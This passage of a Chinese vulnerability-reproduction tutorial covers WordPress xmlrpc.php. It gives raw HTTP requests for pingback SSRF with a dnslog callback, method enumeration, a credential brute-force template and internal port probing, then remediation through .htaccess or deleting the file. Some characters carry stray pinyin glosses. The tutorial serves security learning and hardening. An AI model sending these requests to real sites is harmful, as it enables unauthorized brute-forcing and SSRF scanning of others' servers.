POST /xmlrpc.php HTTP/1.1
Host: www.目標(biāo).com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 310
 
<?xml version="1.0" encoding="iso-8859-1"?>
    <methodCall>
    <methodName>pingback.ping</methodName>
    <params>
    <param><value><string>http://g8o53x.dnslog.cn/</string></value></param>
    <param><value><string>http://www.目標(biāo).com/?p=1</string></value></param>
    </params>
    </methodCall>

發(fā)送數(shù)據(jù)包

驗(yàn)證成功！

四、深入利用

（一）查看系統(tǒng)允許的方法

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99
......
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

（二）賬號(hào)爆破

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99
......
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>password</value></param>
</params>
</methodCall>

（三）通過(guò)Pingback可以實(shí)現(xiàn)的服務(wù)器端請(qǐng)求偽造 (Server-side request forgery，SSRF)和遠(yuǎn)程端口掃描。

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99
.......
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>要探測(cè)的ip和端口：http://127.0.0.1:80</string></value>
</param><param><value><string>要探測(cè)的URL</string>
</value></param></params>
</methodCall>

五、漏洞修復(fù)

（一）通過(guò)APACHE的.htaccess屏蔽xmlrpc.php文件的訪問(wèn)。配置代碼如下：

# protect xmlrpc
<Files "xmlrpc.php">
Order Allow,Deny
Deny from all
</Files>

（二）刪除根目錄下的xmlrpc.php。

到此這篇關(guān)于復(fù)現(xiàn)WordPress xmlrpc.php漏洞和SSRF的文章就介紹到這了,更多相關(guān)WordPress漏洞復(fù)現(xiàn)內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家！

您可能感興趣的文章: